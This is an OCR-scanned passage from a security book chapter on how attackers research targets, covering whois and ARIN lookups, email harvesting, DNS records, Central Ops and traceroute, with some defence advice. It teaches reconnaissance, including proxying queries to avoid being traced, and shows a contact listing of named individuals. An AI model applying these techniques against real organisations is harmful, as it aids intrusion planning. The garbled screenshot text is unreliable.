HP ETHERNET MULTI-ENVIRONMENT,ROM none, JETDIRECT, J0128,EEPROM U.28.61,CIDRTE 86/24/2085 


Once connected, the user can configure the printer. Looks like this guy needs a new toner 
cartridge. 


[JM re IEEE: ips 
Ele Edt Vw Favortes Tools Help 
x &- 

Sle Favortes | hp Laseret 4200000 Gh GS Gh ~ Pee seyr Tos O 


Ua 


invent 


ni 


J Information ){ Setti Networkii 
Device Status. 
Page — 


Device Status 


Device Status. 


ORDER CARTRIDGE LESS THAN 1400 PAGES 
Help © 


@ PauseResume Button @ Continue 


Toners: (% remaining) 


Black Print Cartridge 10% Maintenance kit 72% 
HP Pact Number: Q1338A HP Part Number: 110V-02428A, 220V-02420 
= as 
‘Supplies Details 
[Media 
Input/Output Status Size Type 
Tray 1 ANY SIZE ANY 
Tray 2 AS PLAIN 
STANDARD OUTPUT [me N/A N/A 
Change Settings 


Printer Serial Number. SGFX350135 [æ] 
Firmware Datecode: 20030530 04.016.1 
Mopier: ON 


2: TRAY 2, 500 Sheets 

1: TRAY 1, 100 Sheets 

RAM DISK Storage: 11 MB Capacity I 
DIMM Slot 1:Side 1: 8 MB Flash i 
DIMM Sot 1:Side 2-64 MB SDRAM — [v] 


Other devices with weak implementations of security listed on the Shodan HQ website include 


m Television panels 

W Solar panels 

B Network attached storage 
B Routers 

B Server controls 
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The website works well because people fail to implement security properly. It is always a good idea 
to change the default username and password of a new device. Also, if possible, adjust the device so 
the security settings are configurable only from the LAN, not the Internet. Always set a password. 


[TEDO NOT SET PASSWORD H - Windows Internet Explorer Joey 
2 Cx) E o o _ llek 
Ele Edt Mew Favorites Tools Heb 
x €&- 
yy Favorites {Æ DO NOT SET PASSWORD !!! fa- & J de + Pages Safety~ Toos- @~ 5 


* VIVOTEK DO NOT SET PASSWORD !!! 


In summary, everything is already there on the Internet; you just need to have the skills and 
techniques to be able to find it. One of the techniques that can be utilized to find virtually any- 
thing is by typing what you want to find followed by “rapidshare.com.” Another strategy is to 
find someone who has or knows how to do something, and ask them for assistance. Experts can 
be located in IRC chat rooms, on Twitter, or in forums. Never download any copyrighted mate- 
rial because doing so is both illegal and unethical. Knowing how the hackers do what they do is 
important because you can use the same techniques to make sure that your organization does not 
have any type of information leakage. 


Chapter 7 


Research Time 


Overview 


In this chapter we go over ways that hackers go about researching the targets they wish to attack. 
Smart hackers likely won’t go in with guns blazing trying to hack any system or network available 
to them. They have very specific motivations for what they are targeting and reasons for what they 
want to attack. Hackers are targeting something specific, and need to find many different avenues 
and routes to get to that specific target in order to attack. 

For instance, as an attacker many times the hacker is looking for a specific piece of informa- 
tion, hence the reason for their attack. That’s one of the reasons we have “information assurance” 
and “information security,” as the hacker targets the technical systems that handle the informa- 
tion. Therefore, when they are planning to attack, they are going to target the systems, devices, 
processes, users, and everything involved that touches that specific piece of information. In order 
to know what to target and know how to break into these systems, hackers have to perform tre- 
mendous amounts of research. The true threat of a hacker is measured by his ability to perform 
research on his target. 

As a hacker it’s impossible to know everything—all programming languages, tools, operating 
systems (OSs), exploits, vulnerabilities, and so on. Therefore, he has to research based upon his 
targets. Remember, the more advanced hackers are aware of the consequences of getting caught, 
therefore they know the importance of gathering as much information about the target as possible 
for planning and assessing the best method of attack. This is where information security comes in; 
information security is essentially the protecting of information. The hacker is seeking as much 
information about his potential targets as possible, while the information security professional’s 
job is to try to minimize as much information about his information assets as possible. If the 
hacker doesn’t know what to attack, how can he wage his cyber war? This is something to think 
about. The art of deception works both ways—if security professionals have full control of their 
organizations in deflecting attack research and planning, this is going to confuse and deter many 
hackers. However, this may lead to steadfast motivation of the hacker to do anything possible 
to infiltrate the network, especially since the weakest element is the “human element,” which is 
highly susceptible to social engineering attacks. 
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The point is the more information the attacker has about his target the better he is able to 
develop a well-thought-out plan for his attack. Therefore, as a defender of the network your job is to 
limit the amount of information an attacker can leverage against you. Much of the attack informa- 
tion the hacker is trying to grab is found on the Internet using publicly available research techniques. 


Research, Time, and Planning 


Its important to know that all of the hacker's research goes into planning his attack; good hackers have 
all the time in the world to complete their objective because they know they only have one shot to do 
it, so they have to do it right. Doing it right likely requires having to take some steps necessary to avoid 
detection. Patience is a virtue. However, for every patient hacker, there should be a patient investigator. 

To do it "right" depends on the type of hacker that is trying to penetrate the system or net- 
work. We aren't talking scripting kiddies. The more advanced hackers have the skills and knowl- 
edge to understand the importance of being patient and use precision in their attacks. If it takes 
weeks, months, or years to gather the correct information to craft their attack, they understand 
that that is what needs to be done. This is where time for research comes in; hackers need to gather 
as much information as possible to plan their attack while doing things that will minimize the 
risk of getting caught and eliminating the digital footprint that they leave behind, whether it be 
researching or attacking a target. So if hackers are going to research and gather intelligence on a 
target, the smart hackers are going to try to mask the source of their research. 

Sun Tzu's Art of War is an admired war book written around 500 BC about warfare and strat- 
egy. Many of the lessons contained within can be applied to cyber warfare. The very first chapter 
of that book is "Laying Plans." The hacker's research is laying plans for assessing different points 
that will most likely achieve victory. 


Earth comprises distances, great and small; danger and security; open ground and 
narrow passes; the chances of life and death. 


Sun Tzu 
Sun Tzus Art of War translated by Lionel Giles http:llclassics.mit.edu/ Tzulartwar.txt 


The attacker can be slow and precise, hide their identity, or completely beat down the front door of 
the network. Whatever the strategy may be, the hacker's research is the life or death of his attack; 
his research is what gives his techniques life. The hacker can beat the front down with hundreds of 
exploits or could craft a strategic Google query on an organization that gives him the root password 
to a server. Which is easier? Which leaves more evidence? Just remember the elite hacker is going to 
take his time to research all available vectors to his target, be extremely stealthy about it, and gather 
as much information as possible to develop a plan that leads to the successful victory of his mission. 


All Vectors Possible 


For example, in the last months, years, or probably days you've heard about certain defense con- 
tractors losing intellectual property due to compromised systems and networks. In this scenario, 
the hacker may have somehow brainstormed all the targets that might have had access to the 
information he was looking for such as “top secret plans.” Let's assume for example it's stored on 
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a secured server. The attacker is going to brainstorm and think of every possible avenue of attack 
and do as much research as he can to find all vectors to locate where this information is stored on 
the network. 

In information security, data and information is secured by the information systems that the 
data travels through, such as whether it goes through the email system or the network backbone. 
The hacker is going to expand on those principles and think of all variables of the information he 
wants to steal or servers he wants hacked. There could be users, computers, networks, and hundreds 
of pieces of information to research that are all avenues of attack. As with information security and 
securing the enterprise the hacker takes a possible bottom-up approach to find vectors. The asset 
that the hacker is targeting is only as good as the weakest link in that information system. The 
hacker could target the users that access this information. We would want to know if this informa- 
tion is accessed internally or even externally through the Internet. Hackers just want to know which 
attack vectors have a route to their mission and are likely to look for the easiest option. 


Internal or External Intelligence 


Generally, when hackers are doing research initially most of it will be external information, which 
is external to the organization. Odds are that the hacker doesn’t have internal access to your net- 
work (otherwise he would probably already be in). So the only information the hacker can start 
out with is what he has available to him externally. Externally means what is available to us outside 
the external network and gathering intelligence to target the perimeter of the network and internal 
sources. Externally we may be looking at web servers, routers, firewalls, and everything we can 
find about the Web presence of our target or even specific users themselves. 

An example of attack is the spearfish, as described in social engineering. This is a type of attack 
where a hacker sends a targeted email to a specific user in order to coerce him into compromising 
his user account, password, computer, and so on. This is a common trend among initial compro- 
mises by adversaries. Typically, the hacker might send a malicious Adobe PDF attachment that 
when opened acts as dropper to execute malware that allows the attacker to take over the target 
computer. Well, the hacker didn't just send this at random, such as a mass phishing email; he had 
a reason or motivation behind it. This is where external research comes in. He did his research and 
planned a strategic attack using external intelligence he gathered. 

For instance, say the hacker needed access to a server that was hosting a ^why ninjas are so awe- 
some" website. The hacker, hoping to deface the site and replace it with a “pirates are way better” 
site, would send a spearfish email to find out information on the root administrator of the server 
and maybe his email address. Once he obtained his email address he could then send his malicious 
code to his target or a contact of the target from which he could stage the attack, using some type 
of information he gathered that he almost positively knows the target will open. This could be an 
email from another known colleague, superior, or client contact. Once the attacker is in, he would 
then perform additional internal research on the targets. 


Direct Contact versus Indirect Contact 


Research can be conducted directly or indirectly, trying to gather as much as intelligence as pos- 
sible and learn everything the hacker can about his target. The attacker is going to be strategic as 
possible about it. In order to gather intelligence about his target he is initially going to probe and 
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Figure 7.1 Level of contact and happy hacker. 


collect data about the structure of the network and target without ever scanning the network or 
target directly. This is the difference between direct and indirect contact. 

Direct means the attacker is directly accessing the target or organization in some fashion where 
there might be some type of forensic artifact traced back to the attacker. Indirect means he's using 
some type of third party or proxy to access information and gather intelligence about the target. 
This is essentially, meaning it’s hard to trace it back to him. Normally, the attacker is going to 
exhaust all indirect means necessary first when gathering his intelligence as that minimizes the 
threat of him getting caught or his presence being known. If the intelligence he gathers isn’t 
enough to proceed in the plan then the attacker will have to pursue more direct means. As more 
direct things are done against the system, the amount of artifacts increases (see Figure 7.1). 

This chapter is going to focus on indirect research means, because most direct contact has to 
deal with vulnerability and exploit research found in the later chapters. Therefore, we are going 
to research the organization itself, its individuals, or its technical implementations for avenues of 
attack using mostly indirect means. 


Learning the Topology 


In this stage learning the topology is important because the attacker is going to determine as best 
he can how the network is made up to plan out his attack. He'll be trying to identify the topo- 
logy of the network and determine what hosts he are the weakest link to the outside. The attacker 
should also be identifying the third parties involved in the target network, such as in a typical 
enterprise methodology where third-party sites are trusted back into the corporate network. For 
instance, if there are third-party sites that are just as trusted in the enterprise backbone, those 
might be valid avenues of attack. For instance, a target corporation may have subsidiary compa- 
nies that network into the same backbone that have less stringent information security policies and 
procedures, or third parties that may have none at all (support, vendors, clients). 

In Figure 7.2, you can see Pwn3d Corporation is designed in an extended star topology, where 
the majority of external sites have wide area network (WAN) links into the corporate headquar- 
ters. This is common in the enterprise methodology; the interesting part of this is that in this 
scenario many remote clients and other company sites use the backbone for server services, so if 
for any reason their link goes down they can no longer access a central email server. Notice that 
the area between the Internet and the firewall is a lot less trusted. Typically, at WAN/LAN (local 
area network) intersections you will find firewalls and intrusion detection systems, and this part 
of the segment is constantly being monitored. Once the hacker penetrates the internal network 
their activities might monitored less because they have entered a more trusted area. Therefore, this 
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Figure 7.2 Sample enterprise topology. 


a prime area for the hacker to infiltrate, as they are waiting for him to come from the front door, 
instead of through the sliding glass door in the back. 
Some key points the hacker will be considering are 


B Network topology arrangement 
— Third-party access arrangement 
e Secondary sites 
* Client sites 
B Servers/network devices with outside access (web, email, virtual private network [VPN] 
server) 


To defend against third-party avenues, make sure that all third parties have stringent access 
requirements and security restrictions. This can consist of multifactor authentication between cli- 
ent sites, using sophisticated access control lists (ACLs), monitoring the network perimeter with 
intrusion detection systems (IDS) such as Snort, and turning on all possible logging for threat 
analysis. It is important turn all logging for devices and perform daily analysis on those logs. 
Many information security professionals choose to enable virtual private network (VPN) connec- 
tions between remote sites and treat them like an Internet link—untrusted in their policies and 
procedures. 


Learning the Structure 


The attacker will be trying to determine the make up of the topology to identify detailed 
host-related information. He will want to obtain the network blocks of Internet protocol (IP) 
addresses because this will be the known attack range for the target and will identify avenues 
of hosts to target. Also, he will want to know which and what domain name system (DNS) 
records are associated with what IP addresses and what servers are hosted directly or by a third 
party such as common hosting providers. The DNS makeup will gives us clues about other 
hosts and how the topology is further structured. For instance, for www.dnsl.domain.com, 
the hacker might look at dns2, dns3, and so on. The information we gather from the topology 
and the structure will allow us to use more detailed and advanced vulnerability scanning tech- 
niques to gather valuable target host information through more recon vulnerability scanning, 
as will be explained in Chapter 9. 
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Some key pieces of information the hacker will be obtaining are 


Network blocks of IP addresses 

IP addressing structure 

IP addresses and DNS records for those servers 
DNS makeup 

Identifiable contacts 


— Clients, providers, associated companies 
— Usernames 
— Email addresses 


Techniques and Tools 


One of the greatest assets to the hacker's tool chest is the Internet. He has a plethora of tools 
available to perform various research-gathering techniques using indirect and direct methods. In 
this section we will go over some of the best methods hackers use in order to gather research on 
a target. 


Whois 


The command whois stands for “who is,” and its primary use is to query registers for information 
regarding a domain name. This is what is known as a whois lookup, and it can contain a plethora 
of valuable information. Depending on the registrant being queried and the database used to 
determine the registrant, hackers and investigators alike can determine who owns a domain name, 
what the IP address block of that domain is, and much more additional information such as when 
the domain was registered and even the date it expires. Depending on the service doing the query, 
there may be additional information added to gather information about a target. 

Currently, the Internet Corporation for Assigned Names and Numbers (ICANN) is respon- 
sible for the management of domain names and their IP addresses; prior to 1998 this was done 
by InterNIC. ICANN assigned it to the Internet Assigned Numbers Authority (IANA), oper- 
ated by ICANN, which manages IP address allocation, root zone DNS, and other information. 
The problem is with so many domain name registrars, domain name proxying, and the complex 
management of domain name registering, sometimes you, the hacker, may need to know what 
the authoritative whois server is for the domain, because the more authoritative one may contain 
additional information to leverage. Some of the most popular whois servers are the ones run 
by the American Registry for Internet Numbers (ARIN), or even registrars themselves such as 


GoDaddy. 


Reserved Addresses 


On a second note, if you think your network is under attack by IANA, it is recommend that 
you view the website http://www.iana.org/abuse/. [ANA reserves protocol and number resources 
also, so you may see IP addresses in your logs along the lines of 10, 127, 169.254, 172.16—172.31, 
192.168, and blackhole-1.iana.org. This isn't an attack by IANA itself, it is LANA’s private IP 
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addressing assignments, local loop back addresses, and so on. This will give you a refresher on 
network addressing 101, and prevent you from penetrating 127.0.0.1, due to payback. If you use 
a whois service, its database contains IP addresses, autonomous system numbers, organizations or 
customers that are associated with the resources, and their related points of contact. 


To query via a whois website, or in a web browser, go to www.whois.net or www .internic.com/ 
whois. html. 


4» + JE http: / /www.internic.net/whois.html 


InterNIC 


Home Registrars 
Whois Search 


Whois (.aero, .arpa, .asia, .biz, .cat, .com, .coop, .edu, .info, .int, .jobs, 
mobi, . museum, .name, .net, .org, .pro, and .travel): 
www .microsoft.có.. 
® Domain (ex. intemic.net) 
© Registrar (ex. ABC Registrar, Inc.) 
) Nameserver (ex. NS.EXAMPLE.COM or 192.16.0.192) 


(Submit ) 


For Whois information about country-code (two-letter) top-level domains, try 
Uwhois.com 


Results for .com and .net are provided courtesy of Verisign Global Regist 

these top-level domains, the results of a successful search will contain only technical 
information about the registered domain name and referral information for the registrar of 
the domain name. In the Shared Registration System model, registrars are responsible for 
maintaining Whois domain name contact information. Please refer to the registrar's Whois 
service for additional information 


This page last updated 10/22/2001 


1. From a Linux system, type the following command to retrieve whois information: whois 
ww w.microsoft.com 


Information we can gain: 


rootGbt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


dmir 


One 


«t Shell 


As you can see from this example, we can get detailed contact information about the domain 
we entered. It's important to narrow your queries, because in certain circumstances if you were to 
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just type in, say, "Microsoft.com," you can get every domain registered (mostly spam sites) that 
have the word in your search, such as www.microsoft.com.clickme.com. The most interesting 
pieces of information contained are the administrative contacts. Many times people will put in 
their full name and addresses, along with their email and additional contact information. Notice 
the email address scheme that's in the whois query. Sometimes these can be the same as the user's 
actual login account. For instance, if we assume that the hostmaster's login account could be 
msnhsft, this would be a very relevant avenue of attack for some type of authentication attack. 
Next we can also identify the name servers, shown in the organizations. Using these name servers, 
we can do further reconnaissance to obtain additional domains and IP addresses that may be of 
value to us. 

How to search for email addresses: http://ws.arin.net/whois/. 

Command: whois @“insertdomain”.com. 


e Jess] hit: /ws.arin.net/whols queryinput=X40google.com `? ¢ Ka Google Oy 


ARIN WHOIS Database Search 


Relevant Links: 
ARIN's WHOIS 


ARIN Home Page ARIN Site Map Training: Querying 


Search ARIN WHOIS for: @google.com 


Submit ) 


ABUSE2410-ARIN  (NETWO80-ARIN) postini-MEMl-contactégoogle.com *1-650-NENI-0200 
ABUSE2410-ARIN (ABUSE2410-ARIN) GHB - avi n-abuset@google.com «:-ME-3:8-0200 
AXELROD, Michael (MAX1-ARIN) axelJJsoogle.com dÉ-650-253-0000 

Barkan, Ari (ABA104-ARIN) NMilliccocio.con «1-310-:60- EN 

Barkan, Ari (ABA105-ARIN) ENEoocic.con +1-MMM-460-4012 

Chittimaneni, Kiran Kumar (KKC9-ARIN) Mlliscocie.com :1-650-253-MEN 

Fong, Zhen Elizabeth (ZEF-ARIN) EN coogle.com 8-626-223-3341 

Google Apps (GOOGL-ARIN) EN-2rin-contactégoogle.com *1-650-NHHI-0000 

Google Inc (2G39-ARIN) arin-MEMMécgoogle.com «1-NE-3:8-0200 

Higgin, Shawn Sr. NetEng (SHI68-ARIN) HEB: coogle.com :1-:06-NIBI- 6:50 
Katenin, Gleb (KATEN-ARIN) NEM coos:1o.con J (1) 543-2163 

kwon, david (DKW2-ARIN) WE soogle.com :1-650-NBE- 1322 

Network Administration (NETWO2832-ARIN) HMMecoogle.com +1-650-M-8100 
Network Administration (NETWO81-ARIN) MEM - 2 = in-contact@google.com +1-650-M-0200 
Network Engineering  (NETWO2831-ARIN) postini~§@google.com +1-650-486 -E 
Ng, Tony (TNG31-ARIN) HMf@soogle.com «::-NI-253-2576 

Simmon, Matt (MSI136-ARIN) EE ¢ coogle.com +1-734-MNN-6874 

Socolow, Paul (PSO26-ARIN) Me google.com +1-MM-468-1622 

Weaver, Tracy (TWE97-ARIN) tracy google.com +1-—-276-4794 


# ARIN WHOIS database, last updated 2010-07-03 20:00 
# Enter ? for additional hints on searching ARIN's WHOIS database. 
# 


# ARIN WHOIS data and services are subject to the Terms of Use 

# available at https://www.arin.net/whois tou.html 

# 

# Attention! Changes are coming to ARIN's Whois service on June 26. 

# See https://www.arin.net/features/whois for details on the improvements. 


APNIC LACNIC RIPE InterNIC 


Other WHOIS Servers: AfriNIC 
Request Bulk Copies of ARIN WHOIS Data 
Copyright © 1997-2007 American Registry for Internet Numbers. All Rights Reserved. 


In this query, putting the @ sign before our search turns up every single email address located 
as technical contacts for that domain. This is a very easy way for hackers to query the domain to 
identify targets. Additionally, once again you can see the naming queries of emails for the organi- 
zation. So it’s likely easy for hacker to match up what an individual’s email address is if he knows 
a name. 


How to Defend 


In order to defend against this type of research gathering, IT administrators need to limit the 
amount of information available to users. Therefore, never include actual information about your 
company that is viewable via a whois query, especially anything that gives an attacker a specific 
account to attack. 
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Additionally, while you shouldn't falsify information in your whois because someone 
may need to legitimately contact you, your company can register via a domain proxy service. 
Typically, domain registers will offer an additional service for a fee to register and maintain 
your domain name via a proxy. This makes the proxy’s information public, not your company’s 
information. Therefore, if someone tries to contact you, they contact the proxy service and 
then the service relays the information to you. In addition to the root server, there are also 
whois servers and many third-party tools are available to obtain lots of indirect intelligence. 
Many of these use their interfaces to query whois databases and much more. Once again, the 
same defenses apply. 


Domain Dossier: Central Ops 


Central Ops (www.centralops.net) is a website of network utilities to gather intelligence on 
targets (normally Web administrators use this for diagnostic information). However, this is a 
valuable tool in doing indirect research on targets. Hackers can issue network commands via 
this third-party tool that limits their ability to be traced and helps prevent command from being 
attributable back to them. 


000 Free online network utilities - traceroute, nslookup, automatic whois lookup, ping, finger 
€ | (Qr Google 


aje) Me [B] http:/ /centralops.net/co/ E 


Domain Dossier Investigate domains and IP addresses 
Domain Dossier 


Domain Check domain or IP address yahoo.com 
Email Dossier 


REONESEMEIFESE (V. domain whois record M ONS records @ traceroute 
Ping M network whois record (M service scan soy 
Traceroute 

NsLookup user: 96.244.134.81 [anonymous] 47/50 fin rJ "T. 
AutoWhols log In | get account [errantes 


TcpQuery 
AnalyzePath 


Web hosting 
comparisons 


Address lookup 

Shared hosting 

VPS hosting canonical name yahoo.com. 

Dedicated hosting 

aliases 

addresses 209.131.36.159 
209.191.93.53 
69.147.114.224 iy 


ded 


ES 


As you can see, we can perform domain name whois lookup straight from the Central Ops 
website using the Domain Dossier feature. This will query not only ARIN but also theINTERNIC 
databases, for domain and IP information. As you can see in the image, it also tells us when the 
domain expires. 
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Domain Whois record 


Queried whois.internic.net with "dom yahoo.com"... 


Domain Name: YAHOO.COM 

Registrar: MARKMONITOR INC. 

Whois Server: whois.markmonitor.com 
Referral URL: http://www.markmonitor.com 
Name Server: NS1.YAHOO.COM 

Name Server: NS2.YAHOO.COM 

Name Server: NS3.YAHOO.COM 

Name Server: NS4.YAHOO.COM 

Name Server: NS5.YAHOO.COM 

Status: clientDeleteProhibited 
Status: clientTransferProhibited 
Status: clientUpdateProhibited 
Status: serverDeleteProhibited 
Status: serverTransferProhibited 
Status: serverUpdateProhibited 
Updated Date: 18-nov-200 

Creation Date: 18-jan-1995 
Expiration Date: 19-jan-2012 


>>> Last update of whois database: Tue, 13 Oct 2009 02:52:04 UTC <<< 


As shown in the whois query in the image, diving in deep the hacker can see the different name 
servers that Yahoo or the site targeted uses. The hacker may want to run additional queries against 
the domain servers and/or the IP addresses associated with these servers in order to get additional 
pertinent information. 


Queried whois.markmonitor.com with "yahoo.com"... 


Registrant: 
Domain Administrator 
Yahoo! Inc. 
701 First Avenue 
Sunnyvale CA 94089 
US 
domainadmin@yahoo-inc.com +1.4083493300 Fax: +1.4083493301 


Domain Name: yahoo.com 


Registrar Name: Markmonitor.com 
Registrar Whois: whois.markmonitor.com 
Registrar Homepace: http://www.markmonitor.com 


Administrative Contact: 

Domain Administrator 

Yahoo! Inc. 

701 First Avenue 

Sunnyvale CA 94089 

US 

dGomainadmin@yahoo-inc.com +1.4083493300 Fax: *1.4083493301 
Technical Contact, Zone Contact: 

Domain Administrator 

Yahoo! Inc. 

701 First Avenue 

Sunnyvale CA 94089 

US 

domainadmin@yahoo-inc.com +1.4083493300 Fax: *1.4083493301 


1995-01-18. 
2012-01-18. 
2009-07-07. 


Created on......... see 
Expires On......... s 
Record last updated on 


As we can see in this example whois record, the individual performing the query can also 
determine once again who the registrant is and the contact information for that registrant. Many 
hackers or domain squatters pay attention to the expiration date of the domain, to try to grab it. A 
new law called the Anticybersquatting Consumer Protection Act prevents people from registering 
a domain name with bad faith to profit on someone else's trademark. 
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Defense against Cyber Squatters 


Don’t forget to pay the bill to your domain hosting company! Make sure you have up-to-date 
contact information for them to contact you. Service providers now allow users to backorder 
a domain so if for any reason a domain expires, someone can easily grab it and take control. 
However, when a domain is past the expiration date, it goes into what is called expired status. The 
domain is then considered disabled and this allows the owner one last opportunity to pay his dues 
to the registrar. After those 40 days or so it gives the owner additional time to re-register, then after 
that the domain will lock for deletion. After 5 days or so the name will delete from the ICANN 
database and anyone will be able to pick it up again (this process takes about 75 days). Therefore, 
pay your registrar and hosting bills! 


DNS Records 


000 Free online network utilities - traceroute, nslookup, automatic whois lookup, ping, finger 


7T | > | |b [Bf]http://centralops.net/co/ € | (Q Google 


ne Internet utilities 


Utilities About 


DNS records 
name class type data time to live 
Domain Ch 
Email Dossier yahoo.com IN SOA server: nsi.yahoo.com 1800s (00:30:00) 
Browser Mirror = 
emal: hostmaster.yahoo- 
Inc.com 
serial: 2009101303 
Ns jp refresh: 3600 
Eus retry: 300 
'cpQuery 
'AnalyzePsth expire: 1814400 
ii 
ur mum 600 
Web hosting : 
comparisons yahoo.com IN A 209.191.93.53 21600s (06:00:00) 
yahoo.com IN A 69.147.114.224 21600s (06:00:00) 
yahoo.com IN A  209.131.36.159 21600s (06:00:00) 
yahoo.com IN MX preference: ü 7200s (02:00:00) 
E exchange: —d.mx.mail.yahoo.com h 
yahoo.com IN MX preference: 1 7200s (02:00:00) 
exchange: — e.mx.mail.yahoo.com 
yahoo.com IN MX preference: 1 7200s (02:00:00) 
exchange: —f.mx.mail.yahoo.com 
yahoo.com IN MX preference: 1 7200s (02:00:00) 
exchange: g.mx.mail.yahoo.com 
yahoo.com IN MX preference: 1 7200s (02:00:00) 
exchange: —a.mx.mail.yahoo.com 
yahoo.com IN MX preference: 1 7200s (02:00:00) 
exchange: —b.mx.mail.yahoo.com 


In this example, you can also see the top-level DNS records for www.yahoo.com. Here we can 
see the class; IN is for the Internet. We are most concerned with the type A records. In DNS 
resource records, code A stands for a return of a 32-bit IPv4 address. AAAA is a 128-bit IPv6 
address. For more information on DNS records, google *DNS records." Remember that hackers 
can't know everything and they will constantly be looking up new information they find to see 
what it means. A records are IP addresses for Yahoo's web servers. In this example, we can see that 
Yahoo.com's DNS IN A entries are: 


209.191.93.53 
69.147.114.224 
209.131.36.159 
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These are all external addresses available on which the hacker can do further research. 

In the example below you will see that if you enter in any of the addresses from the DNS A 
records, these will all return back to Yahoo. There are many reasons companies or individuals may 
use multiple web servers. This may be for /oadbalancing (using multiple servers to host web pages), 
for authentication, or for other server functions. However, hackers will try to determine as many 
IP addresses to attack as possible, as these are all avenues into the enterprise. 


"ana yahoo! 
[a| > | | + Jerntep://209.131.36.159/ € | (Qr Google Q 


Take a sneak peek at the new Yahoo! homepage Close X 


"YAHOO! 


Web images Video Local Shopping more v 


Search: | | WebSearch | 
| Yahoo! Homo BOALO] Oct 17,2009 ` Page Options F) 
F d i 
@ Answers — Entertainment... Spon, l Lib Check your mail status: Signin Free mail: Sign Up 
@ Autos Moore's shapeless gown 
@ Finance Demi Moore sports a dress that is as vll @ Messenger E? Funnies 
flattering as a silk potato sack. 

G 

: TE » A peculiar necklace, too ED Weather | @ Events Q Horoscopes 
roe Q January Jones disses Kutcher 

QJ HotJobs E See celebrities who are expecting 
RA Move — Rent Movies From Netflix 
Lo. Fl — prier i 

Movies | TV 


[FFAS] 1s this phone rudeness or OK | ‘Wild Things movie may not 


- | 
® music Raza] behavior? be for kids n 
AP omc » More: Featured | Buzz ; 4 
— > M 


Lm narum 


Al 


You may notice that the three IP addresses are in completely different IP address ranges. If we 
use Central Ops to further investigate this, we can see that the following ranges are assigned to 
the domain we investigated: 


209.191.64.0—209.191.127.255 
69.147.64.0—69.147.127.255 
209.131.32.0—209.131.63.255 


From the domain we investigated, the hacker could also do further research on these IP address 
ranges to see what other avenues he can find. 


Traceroute 


"Traceroute is a tool used by network administrators to troubleshoot endpoint-to-endpoint net- 
work communication. Using this tool allows someone to determine the amount of router hops 
and other information in between the source and destination. The hacker can use the tracer- 
oute command externally to figure out all of the routers or hops in between the hacker and the 
target, or identify other network devices of value. Additionally, network administrators can 
use this tool to determine where packets are being dropped, latency delays, and incorrect rout- 
ing of network equipment if they are trying to fix network issues. Traceroute works by using 
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the time to live, or TTL, feature of the transmission control protocol (TCP)/IP. Traceroute 
relies upon the internet control message protocol, or ICMP. Basically, an IP packet contains 
an 8-bit field in the IP header, which is usually measured in seconds. Whenever an IP packet 
is sent over the Internet and a router forwards a packet it must decrease this TTL value at least 
by 1, and possibly more depending on how long the router stores the packet. If a router receives 
a packet and the TTL value is 0 then the router knows to discard the packet and no longer 
forward it. 

Therefore, every time a packet hops to a new router, that is considered one hop and the TTL 
value is decreased by 1. Say for instance there are three hops between host A and host B. Therefore, 
there would be three routers between the hosts. The routers will only forward the packet if it 
doesn’t exceed the Time to Live value. When a router receives a packet, it checks the TTL value, 
decreases the value by 1, and sends it off to the next router in the sequence. Whenever that TTL 
value counts down to 0, the router will then stop forwarding the packet and send back a message 
to the original sender of the packet. 

This message is an “ICMP time exceeded” message, although sometimes when using trace- 
route in Linux/Unix it can default to the user datagram protocol (UDP) protocol on ports 33434 
and above. This range is supposed to be unused, so you get an ICMP unreachable port message 
when using traceroute. However, UDP implementation of traceroute relies upon the destination 
sending the ICMP unreachable message; if a firewall or a legitimate program is using that port 
then you can’t know when the trace ends. 

With modern implementations of firewalls blocking unknown ports, TCP scans are more 
reliable. In this sequence, the hacker tries to specify a known TCP port, as we know this will 
go through the firewall. Using the TCP method uses the half-open TCP handshake, which pre- 
vents many applications from seeing the probe. As you network geeks know, whenever a network 
connection is made using the TCP, a three-way reliable handshake happens: SYN, SYN ACK, 
and ACK. 

Here is an easy way to understand a TCP connection: Host A wants to make a TCP connec- 
tion with Host B. 


1. Host A> B SYN “Tm Host and I want to talk.” 

2. Host B > A ACK + SYN “I acknowledge you want to talk and I want to talk too.” 
It is half open unless acknowledgment is sent. 

3. Host A > B ACK “Acknowledge” 


During this sequence, in our TCP request the traceroute only sends a SYN and waits for the SYN + 
ACK; this is what’s called “half open” since Host B is waiting for the ACK. Now when you send a 
TCP request to a port that is nonlistening, a TCP reset will be sent back. For an active listening port 
a SYN + ACK will be sent back, instead of sending a ACK back; in TCP mode the traceroute 
program as part of Linux will send back a TCP reset flag, that way the application will never take 
notice. In Linux we can actually specify which UDP and TCP ports to probe on and which TCP 
flags to send with. You can even just send raw IP packet data. 

Some hackers know that they have all of these options available so the way they use the trace- 
route command. If you are interested in all the features of traceroute then type “man traceroute” 
in Linux. 

Regardless, this technique shows the route of the packet to the destination network. Network 
engineers and administrators use this to determine network failure or troubleshoot networks, such 
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as a router using incorrect routes, bad ACL implementations, or just downed links. The hacker 
using this protocol can determine more IP address ranges and hosts for further intelligence 
gathering, and can even use this TCP, UDP, and ICMP protocol behavior to gain in-depth knowl- 
edge about his victim. 


Commands to Perform a Command Line Traceroute 


m Windows terminal: tracert www.yahoo.com 
B Linux: traceroute -T for TCP SYN probes; traceroute —I for TCP ICMP probes 
B To perform a TCP traceroute: traceroute -T —p 80 domainname.com 


mm root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


The Linux command line tool gives much flexibility to the traceroute command; you can also 
change byte size. It's important to note that we are performing external reconnaissance on our 
targets. Therefore, the hacker knows he would have to use some type of proxy and wouldn't want 
to use his direct IP address in order to prevent being caught. Therefore, we can use a service such 
as Central Ops to proxy our traceroute. In the next chapter, we will go into more direct scanning 
and research methods, as the focus is indirect in this chapter. 


Traceroute: Central Ops 


Now go to CentralOps.net and perform a traceroute. Note there are also many other websites 
out there that will perform these types of network utilities. As you can see from the image, the 
traceroute will quickly convert your domain to an IP address, similar to ping. You can also see all 
of the IP addresses associated in the traceroute, and their DNS hostname if available. RTT stands 
for "round trip delay time," the time it takes for each hop in the trace. 
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Free online network utilities - traceroute, nslookup, automatic whois lookup, ping, finger 
4 | > | | + Einttp://centralops.net/co € | (Q Google 


Central OPS -MEt 5054 eret utilities sse or :Hexillion 
About 


Utilities 
Traceroute 


Domain Dossier 


omal Che 
Email D = Tracing route to yahoo.com [209.131.36.159]... 
Drowser-Mirror hop rtt rtt rtt ip address fully qualified domain name 
Ping 1 1 0 O 70.84.211.97 61.d3.5446.static.theplanet.com 
Traceroute 
NsLookup 2 o o O 70.87.254.1 po101.dsr01.dlistxS.theplanet.com 
